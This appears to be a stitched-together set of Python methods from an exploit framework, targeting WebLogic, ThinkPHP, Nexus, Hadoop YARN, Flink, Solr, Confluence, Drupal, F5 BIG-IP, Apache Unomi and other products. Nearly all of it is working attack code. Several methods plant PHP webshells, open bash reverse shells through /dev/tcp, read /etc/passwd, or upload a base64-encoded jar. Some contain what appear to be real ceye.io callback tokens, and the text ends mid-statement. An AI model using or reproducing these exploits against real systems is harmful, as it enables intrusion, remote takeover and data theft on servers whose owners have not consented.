def _verify(self):
result = {}
veri_url = urljoin(self.url, '/_async/AsyncResponseService')
cmd = random_str(16) + '.6eb4yw.ceye.io'
payload = self.get_check_payload(cmd)
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
'Accept-Encoding': "gzip, deflate",
'Cookie': "sidebar_collapsed=false",
'Connection': "close",
'Upgrade-Insecure-Requests': "1",
'Content-Type': "text/xml",
'Content-Length': "1001",
'cache-control': "no-cache"
}
try:
requests.post(veri_url, data=payload, headers=headers)
res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
if cmd in res.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _attack(self):
result = {}
filename = random_str(6) + ".php"
webshell = r'''<?php echo "green day";@eval($_POST["pass"]);?>'''
p = self._check(self.url)
if p:
data = p[1]
# data["vars[1][]"] = "echo '{content}' > {filename}".format(filename=filename,
# content=quote(webshell))
data["vars[1][]"] = "echo '{content}' | tee {filename}".format(filename=filename, content=webshell)
data["vars[0]"] = "system"
vulurl = self.url + p[0]
requests.post(vulurl, data=data)
r = requests.get(self.url + "/" + filename)
if r.status_code == 200 and "green day" in r.text:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = self.url + "/" + filename
result['ShellInfo']['Content'] = webshell
if not result:
vulurl = self.url + r"/index.php?s=index/\think\template\driver\file/write&cacheFile={filename}&content={content}"
vulurl = vulurl.format(filename=filename, content=quote(webshell))
requests.get(vulurl)
r = requests.get(self.url + "/" + filename)
if r.status_code == 200 and "green day" in r.text:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = self.url + "/" + filename
result['ShellInfo']['Content'] = webshell
return self.parse_output(result)
def _verify(self):
result = {}
veri_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
random_uri = random_str(16)
check_host = 'zum76x.ceye.io'
check_port = 80
payload = self.get_check_payload(check_host, check_port, random_uri)
headers = {
"Content-Type":
"text/xml;charset=UTF-8",
"User-Agent":
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
}
try:
requests.post(veri_url, data=payload, headers=headers)
resp = requests.get(
'http://api.ceye.io/v1/records?token=7404ec52d62f743915a2a3adc07a2077&type=request'
)
pattern = 'http://{0}(:{1})?/{2}'.format(check_host, check_port,
random_uri)
if re.search(pattern, resp.text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _verify(self):
result = {}
try:
target = self.url + '/service/rest/beta/repositories/go/group'
cmd = random_str(16) + '.6eb4yw.ceye.io'
cmd2 = 'ping ' + cmd
payload = "$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('%s')}" % cmd2
data = {
"name": "internal",
"online": "true",
"storage": {
"blobStoreName": "default",
"strictContentTypeValidation": "true"
},
"group": {
"memberNames": [payload]
}
}
requests.post(target, data=json.dumps(data), headers=self._headers)
res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target
result['VerifyInfo']['Payload'] = payload
except:
pass
return self.parse_output(result)
def _check(self):
self.url = self.url.rstrip('/')
try:
rep = requests.post(self.url + "/analytics/telemetry/ph/api/hyper/send?_c&_i=test",
headers={"Content-Type": "application/json"}, data="lorem ipsum")
if rep.status_code == 201:
return True
headers = {
"Accept-Encoding": "gzip, deflate",
"X-Deployment-Secret": "abc",
"accept": "application/vapi",
"Connection": "keep-alive",
"Content-Type": "application/json",
}
rep = requests.post(self.url + "/analytics/ph/api/dataapp/agent?_c=test&_i=1", headers=headers, data="{}")
if rep.status_code == 201:
return True
headers["Connection"] = "close"
rep = requests.post(self.url + "/analytics/ph/api/dataapp/agent?action=collect&_c=test&_i=1",
headers=headers,
data="{}")
if rep.status_code == 200:
return True
except Exception as e:
logger.error(e)
def _verify(self):
result = {}
payload = random_str(16) + '.6eb4yw.ceye.io'
cmd = 'ping ' + payload
try:
if self.url[-1] == '/':
url1 = self.url + 'ws/v1/cluster/apps/new-application'
url2 = self.url + 'ws/v1/cluster/apps'
else:
url1 = self.url + '/' + 'ws/v1/cluster/apps/new-application'
url2 = self.url + '/' + 'ws/v1/cluster/apps'
resp = requests.post(url=url1)
app_id = resp.json()['application-id']
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '%s' % cmd,
},
},
'application-type': 'YARN',
}
attack = requests.post(
url=url2,
json=data
)
res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
if payload in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.info(e)
return self.parse_output(result)
def POC_1(self,target_url):
vuln_url = target_url + "/seeyon/thirdpartyController.do"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
}
data = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1"
response = requests.post(url=vuln_url, headers=headers, data=data)
if response.status_code == 200 and "a8genius.do" in response.text and 'set-cookie' in str(
response.headers).lower():
cookies = response.cookies
cookies = requests.utils.dict_from_cookiejar(cookies)
cookie = cookies['JSESSIONID']
targeturl = target_url + '/seeyon/fileUpload.do?method=processUpload'
print("\033[32m[o] 目标 {} 正在上传压缩包文件.... \n[o] Cookie: {} \033[0m".format(target_url, cookie))
files = [('file1', ('360icon.png', open('pocs/resources/z.zip', 'rb'), 'image/png'))]
headers = {'Cookie': "JSESSIONID=%s" % cookie}
data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver': "false", "type": '0',
'isEncrypt': "0"}
response = requests.post(url=targeturl, files=files, data=data, headers=headers)
reg = re.findall('fileurls=fileurls\+","\+\'(.+)\'', response.text, re.I)
if len(reg) == 0:
# sys.exit("上传文件失败")
print("上传失败")
return self.parse_output()
return self.POC_2(target_url, cookie, reg, headers)
else:
return self.parse_output()
def _verify(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = [pr.port]
else:
ports = [8081]
for port in ports:
try:
#get flink web path
url_check = '{}://{}:{}/jobmanager/config'.format(
pr.scheme, pr.hostname, port)
r_test = req.get(url_check, verify=False)
if r_test.status_code == 200:
m = re.findall(b'/tmp/flink-web-(.+?)"', r_test.content)
if not m:
continue
#upload jars
random_jars = '{}.jar'.format(random.randint(
10000, 100000))
flink_upload_pathfile = '/tmp/flink-web-{}/flink-web-upload/{}'.format(
m[0].decode('utf-8'), random_jars)
upload_files = {
'jarfile':
(flink_upload_pathfile,
base64.b64decode(
'UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA'
))
}
url_upload = '{}://{}:{}/jars/upload'.format(
pr.scheme, pr.hostname, port)
r_upload = req.post(url_upload,
files=upload_files,
verify=False)
if r_upload.status_code != 400:
continue
# exeucte
random_log = 'flink--standalonesession-0-{}.log'.format(
random.randint(10000, 100000))
url_exeucte = '{}://{}:{}/jars/{}/run?entry-class=Execute&program-args="touch $FLINK_HOME/log/{}"'.format(
pr.scheme, pr.hostname, port, random_jars, random_log)
r_execute = req.post(url_exeucte, verify=False)
# check log exists:
if r_execute.status_code != 400:
continue
url_log_exist = '{}://{}:{}/jobmanager/logs/{}'.format(
pr.scheme, pr.hostname, port, random_log)
r_exist = req.get(url_log_exist, verify=False)
if r_exist.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(
pr.hostname, port)
break
except:
raise
#pass
return self.parse_attack(result)
def _verify(self):
result = {}
vul_url = self.url
target_url = vul_url + "/service/extdirect"
j = {
"action":
"coreui_Task",
"method":
"create",
"data": [{
"id": "NX.coreui.model.Task-2",
"typeId": "script",
"enabled": "true",
"name": "test_exec",
"alertEmail": "*****@*****.**",
"schedule": "manual",
"properties": {
"language": "groovy",
"source": "println \"calc\".execute().text"
},
"recurringDays": [],
"startDate": None,
"timeZoneOffset": "+08:00"
}],
"type":
"rpc",
"tid":
14
}
self.headers.update(self.auth())
self.headers.pop('User-Agent') # 删除默认UA,避免产生CSRF错误
resp = req.post(target_url,
json=j,
headers=self.headers,
proxies=self.proxies)
# 拿到task id
task_id = self.get_task_id(resp)
j2 = {
"action": "coreui_Task",
"method": "run",
"data": [task_id],
"type": "rpc",
"tid": 17
}
req.post(target_url,
json=j2,
headers=self.headers,
proxies=self.proxies)
return self.save_output(result)
def _verify(self):
result={}
vul_url = self.url
host, port = url2ip(vul_url, True)
logger.info("检查端口开放情况...")
# 端口都不开放就不浪费时间了
if not self.is_port_open(host, port):
logger.info("端口不开放! 退出!")
return
logger.info("端口开放... 继续")
url_cores = vul_url + "/solr/admin/cores?wt=json"
payload = { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":"true"}}
payload2= 'stream.url=file:///etc/passwd'
flag = 'root:x:0:0' # /etc/passwd的标志
core_names = self.get_core_names(url_cores)
logger.info(core_names)
# 对每个core都发送一次请求
for core_name in core_names:
logger.info("当前core_name: " + core_name)
config_url = '{0}/solr/{1}/config'.format(self.url, core_name)
stream_url = '{0}/solr/{1}/debug/dump?param=ContentStreams'.format(self.url, core_name)
target_url = config_url
resp = None
try:
req.post(config_url, json=payload, timeout=5)
#resp = req.post(stream_url, data=payload2,timeout=5)
resp = req.post(stream_url, data={'stream.url': 'file:///etc/passwd'}, timeout=5)
except Exception as e:
logger.error(e)
#continue
logger.info(resp.status_code)
if resp.status_code == 404:
logger.info('Not Found!')
elif flag in resp.text:
file_content = resp.json()['streams'][0]['stream']
logger.info(file_content)
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
result['VerifyInfo']['core'] = core_name
result['VerifyInfo']['Payload'] = payload2
result['VerifyInfo']['Response'] = file_content
return self.save_output(result)
return self.save_output(result)
def _shell(self):
# cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())
cmd = self.get_option("command")
p = self._check(self.url)
if p:
data = p[1]
data["vars[0]"] = "system"
data["vars[1][]"] = cmd
vulurl = self.url + p[0]
requests.post(vulurl, data=data)
def _shell(self):
cmd = self.get_option("command")
vulurl = self.url + "/index.php?s=captcha"
data = {
'_method': '__construct',
'filter[]': 'system',
'method': 'get',
'server[REQUEST_METHOD]': cmd
}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
requests.post(vulurl, data=data, headers=headers)
def _shell(self):
veri_url1 = urljoin(
self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
cmd = self.get_option("command")
data = "';{};'".format(cmd)
headers = {'cookie': 'isAdmin=1;username=admin'}
try:
requests.get(veri_url1)
requests.post(veri_url2, data=data, headers=headers)
except Exception as e:
logger.warn(str(e))
def _verify(self):
result = {}
vul_url = self.url
target_url = vul_url + "/service/extdirect"
headers = {'Referer': ''}
j = {
"action":
"coreui_Component",
"method":
"previewAssets",
"data": [{
"page":
1,
"start":
0,
"limit":
25,
"filter": [{
"property": "repositoryName",
"value": "*"
}, {
"property":
"expression",
"value":
"1.class.forName('java.lang.Runtime').getRuntime().exec('ping {0}.{1}').waitFor()"
.format(self.BANNER, self.DOMAIN)
}, {
"property": "type",
"value": "jexl"
}]
}],
"type":
"rpc",
"tid":
4
}
try:
req.post(target_url, json=j, headers=headers, proxies=self.proxies)
except Exception as e:
e.printStackTrace()
time.sleep(2) # 休眠2s等待ceye生成记录
if self.test_dnslog(self.CEYE_URL):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
def _shell(self):
vul_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1'.format(
get_listener_ip(), get_listener_port())
shell_payload = self.get_shell_payload('/bin/bash', '-c', cmd)
headers = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
}
try:
requests.post(vul_url, data=shell_payload, headers=headers)
except Exception as e:
logger.warn(str(e))
def poc(url):
res = requests.post(url + 'website/blog/',
json=poc1,
verify=False,
timeout=10,
headers=headers)
res1 = requests.post(url + '_search?pretty',
json=poc2,
verify=False,
timeout=10,
headers=headers)
if "blog" in res.text and "uid=" in res1.text:
return True
return False
def _shell(self):
vulurl = self.url + "/index.php?s=captcha"
# 生成写入文件的shellcode
_list = generate_shellcode_list(listener_ip=get_listener_ip(),
listener_port=get_listener_port(),
os_target=OS.LINUX,
os_target_arch=OS_ARCH.X86)
for i in _list:
data = {
'_method': '__construct',
'filter[]': 'system',
'method': 'get',
'server[REQUEST_METHOD]': i
}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
requests.post(vulurl, data=data, headers=headers)
def _verify(self):
result = {}
cookies = self.login()
random_uri = random_str(16)
logger.info("random_uri为:%s" % random_uri)
verify_payload = "update of_cms_link set link_name=updatexml(1,concat(0x7e,('" + random_uri + "'),0x7e),0) where link_id=4"
post_data = {"sql": verify_payload}
veri_url = urljoin(
self.url, '/ofcms-admin/admin/system/generate/create.json?sqlid=')
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent":
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"Cookie": cookies
}
logger.info("Headres如下:")
logger.info(headers)
try:
resp = requests.post(veri_url, data=post_data, headers=headers)
flag = "~" + random_uri + "~"
if flag in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = verify_payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def login(self):
login_url = urljoin(self.url, '/ofcms-admin/admin/dologin.json')
post_data = {
"username": self.get_option("username"),
"password": self.get_option("password")
}
headers = {
"Content-Type":
"application/json; charset=UTF-8",
"User-Agent":
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
}
try:
resp = requests.post(login_url, data=json.dumps(post_data))
if resp.status_code == 200 and json.loads(
resp.text)['code'] == '200':
cookies = requests.utils.dict_from_cookiejar(resp.cookies)
cookie = "JSESSIONID=" + cookies["JSESSIONID"]
logger.info("获得的Cookie为:%s" % cookie)
logger.info("Ofcms系统登录成功")
else:
logger.info("Ofcms系统登录失败,报错为 %s " % str(resp.text))
except Exception as e:
logger.warn(e)
logger.warn("Ofcms系统登录失败")
return cookie
def _shell(self):
result = {}
#执行反弹shell的请求
pocurl = self.url + '/context.json'
pocheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
'Content-Type': 'application/json;charset=UTF-8',
'Content-Length': '1003',
'Accept': 'application/json, text/plain, */*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
IP = get_listener_ip()
PORT = get_listener_port()
# IP = yourlistenerip
# PORT = yourlistenerport
payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1'
payload = 'bash -c {echo,' + (base64.b64encode(
payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} '
try:
r2 = requests.post(url=pocurl,
headers=pocheaders,
data=pocjson,
verify=False) #执行ping指令
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
def _verify(self):
result = {}
headers = {}
target = self.url + '/rest/tinymce/1/macro/preview'
payload = {
'contentId': '786458',
'macro': {
'name': 'widget',
'body': '',
'params': {
'url': 'https://www.viddler.com/v/23464dc6',
'width': '1000',
'height': '1000',
'_template': 'file:///etc/passwd'
}
}
}
referer = self.url + '/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&'
content_type = 'application/json; charset=utf-8'
headers['Referer'] = referer
headers[
'Content-Type'] = content_type #需要设置Content-Type,否则会显示XSRF check failed
response = requests.post(target,
data=json.dumps(payload),
headers=headers)
content = response.content
poc_output = etree.HTML(content).xpath(
'//div[@class="wiki-content"]/text()')[0].strip()
keyword = 'root:x:0:0:root:/root' #/etc/passwd关键字
if keyword in poc_output:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target
return self.parse_output(result)
def _shell(self):
result = {}
#执行反弹shell的请求
pocurl = self.url + '/context.json'
pocheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
'Content-Type': 'application/json;charset=UTF-8',
'Content-Length': '1003',
'Accept': 'application/json, text/plain, */*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
IP = get_listener_ip()
PORT = get_listener_port()
# IP = yourlistenerip
# PORT = yourlistenerport
payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1'
payload = 'bash -c {echo,' + (base64.b64encode(
payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
try:
r2 = requests.post(url=pocurl,
headers=pocheaders,
data=pocjson,
verify=False) #执行ping指令
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
def _verify(self):
result = {}
filename = "../web.xml"
limitSize = 1000
paylaod = self.url + "/rest/tinymce/1/macro/preview"
headers = {
"User-Agent":
"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Referer": self.url +
"/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
"Content-Type": "application/json; charset=utf-8"
}
data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
r = requests.post(paylaod, data=data, headers=headers)
if r.status_code == 200 and "</web-app>" in r.text:
m = re.search('<web-app[\s\S]+<\/web-app>', r.text)
if m:
content = m.group()[:limitSize]
result['FileInfo'] = {}
result['FileInfo']['Filename'] = filename
result['FileInfo']['Content'] = content
return self.parse_output(result)
def _attack(self):
result = {}
filename = random_str(6)+'.php'
webshell = '''<?php echo 'DEADBEEF';eval($_REQUEST['CzRee']); ?>'''
url = self.url.rstrip('/') + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
cmd = '''echo {} | base64 -d | tee {}'''.format(base64.b64encode(webshell.encode()).decode(), filename)
payload = {
'form_id': 'user_register_form',
'_drupal_ajax': '1',
'mail[#post_render][]': 'exec',
'mail[#type]': 'markup',
'mail[#markup]': cmd
}
resp = requests.post(url, data=payload)
r = requests.get(urljoin(self.url, filename))
try:
if 'DEADBEEF' in r.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Postdata'] = payload
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = urljoin(self.url, filename)
result['ShellInfo']['Content'] = 'CzRee'
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def pma_login(self, url, username, password):
for i in range(2):
try:
res = requests.get(url)
cookies = dict(res.cookies)
data = {
'set_session':
html.unescape(
re.search(r"name=\"set_session\" value=\"(.+?)\"",
res.text, re.I).group(1)),
'token':
html.unescape(
re.search(r"name=\"token\" value=\"(.+?)\"", res.text,
re.I).group(1)),
'pma_username':
username,
'pma_password':
password,
}
res = requests.post(url, cookies=cookies, data=data, timeout=3)
cookies = dict(res.cookies)
return 'pmaAuth-1' in cookies
except:
pass
return False
def _verify(self):
result = {}
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded'
}
path = "/pages/createpage-entervariables.action?SpaceKey=x"
url = self.url + path
num1 = random.randint(100, 999)
num2 = random.randint(100, 999)
num = num1 * num2
payload = f"queryString=aaaaaaaa%5Cu0027%2B%7B{num1}%2A{num2}%7D%2B%5Cu0027"
try:
proxies = {'https': '127.0.0.1:8080', 'http': '127.0.0.1:8080'}
resq = requests.post(url=url,
headers=headers,
data=payload,
timeout=5)
if resq and resq.status_code == 200 and str(num) in resq.text:
#print(resq_windows.text)
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['POC'] = payload
except Exception as e:
return
return self.parse_output(result)
def _attack(self):
result = {}
code = self.get_option("code")
path = "/php/addscenedata.php"
headers = {
'Content-Type':
'multipart/form-data; boundary=----WebKitFormBoundary4LuoBRpTiVBo9cIQ'
}
url = self.url + path
data = f'''
------WebKitFormBoundary4LuoBRpTiVBo9cIQ
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: text/plain
{code}
------WebKitFormBoundary4LuoBRpTiVBo9cIQ--'''
try:
resq = requests.post(url=url,
headers=headers,
data=data,
timeout=5)
t = resq.text
t = t.replace('\n', '').replace('\r', '')
print('File Path >>> ' + f'{self.url}/php/shell.php')
t = t.replace(" ", "")
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Name'] = t
except Exception as e:
return
def _verify(self):
result = {}
path = "/php/addscenedata.php"
headers = {
'Content-Type':
'multipart/form-data; boundary=----WebKitFormBoundary4LuoBRpTiVBo9cIQ'
}
url = self.url + path
data = '''
------WebKitFormBoundary4LuoBRpTiVBo9cIQ
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: text/plain
<?php echo md5(233);unlink(__FILE__);?>
------WebKitFormBoundary4LuoBRpTiVBo9cIQ--'''
try:
resq = requests.post(url=url,
headers=headers,
data=data,
timeout=5)
resq_results = requests.get(url=self.url +
'/images/scene/shell.php')
if "e165421110ba03099a1c0393373c5b43" in resq_results.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['POC'] = path
result['VerifyInfo'][
'path'] = self.url + '/images/scene/shell.php'
except Exception as e:
return
return self.parse_output(result)
def _attack(self):
result = {}
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded'
}
path = "/pages/createpage-entervariables.action?SpaceKey=x"
cmd = self.get_option("cmd")
url = self.url + path
payload = "queryString=aaaaaaaa%5Cu0027%2B%7BClass.forName%28%5Cu0027javax.script.ScriptEngineManager%5Cu0027%29.newInstance%28%29.getEngineByName%28%5Cu0027JavaScript%5Cu0027%29.%5Cu0065val%28%5Cu0027var+isWin+%3D+java.lang.System.getProperty%28%5Cu0022os.name%5Cu0022%29.toLowerCase%28%29.contains%28%5Cu0022win%5Cu0022%29%3B+var+cmd+%3D+new+java.lang.String%28%5Cu0022" + cmd + "%5Cu0022%29%3Bvar+p+%3D+new+java.lang.ProcessBuilder%28%29%3B+if%28isWin%29%7Bp.command%28%5Cu0022cmd.exe%5Cu0022%2C+%5Cu0022%2Fc%5Cu0022%2C+cmd%29%3B+%7D+else%7Bp.command%28%5Cu0022bash%5Cu0022%2C+%5Cu0022-c%5Cu0022%2C+cmd%29%3B+%7Dp.redirectErrorStream%28true%29%3B+var+process%3D+p.start%28%29%3B+var+inputStreamReader+%3D+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3B+var+bufferedReader+%3D+new+java.io.BufferedReader%28inputStreamReader%29%3B+var+line+%3D+%5Cu0022%5Cu0022%3B+var+output+%3D+%5Cu0022%5Cu0022%3B+while%28%28line+%3D+bufferedReader.readLine%28%29%29+%21%3D+null%29%7Boutput+%3D+output+%2B+line+%2B+java.lang.Character.toString%2810%29%3B+%7D%5Cu0027%29%7D%2B%5Cu0027bbbbbbbb"
try:
proxies = {'https': '127.0.0.1:8080', 'http': '127.0.0.1:8080'}
resq = requests.post(url=url,
headers=headers,
data=payload,
timeout=5)
pattern = re.compile(r'(?<=aaaaaaaa\[)[\S\s]+?(?=\]bbbbbbb)')
t = pattern.findall(resq.text)[0]
t = t.replace('\r', '')
print('output >>> \n' + t)
t = t.replace(" ", "")
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Name'] = t
except Exception as e:
return
def _attack(self):
result = {}
path = "/mgmt/tm/util/bash"
url = self.url + path
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
'Connection': 'keep-alive, X-F5-Auth-Token',
'X-F5-Auth-Token': 'a',
'Authorization': 'Basic YWRtaW46',
'Content-Type': 'application/json',
}
command = self.get_option("cmd")
data = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)}
try:
resq = requests.post(url=url, headers=headers, json=data)
if resq.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Command echo'] = json.loads(
